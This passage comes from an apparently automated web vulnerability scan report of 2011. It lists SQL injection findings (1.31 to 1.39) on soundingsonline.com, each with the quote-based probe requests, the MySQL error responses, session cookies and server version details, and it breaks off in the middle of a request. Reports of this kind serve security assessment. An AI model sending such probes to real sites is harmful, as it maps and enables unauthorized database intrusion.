P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.31. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.32. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.33. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.34. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.35. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.36. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.37. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.38. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.39. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
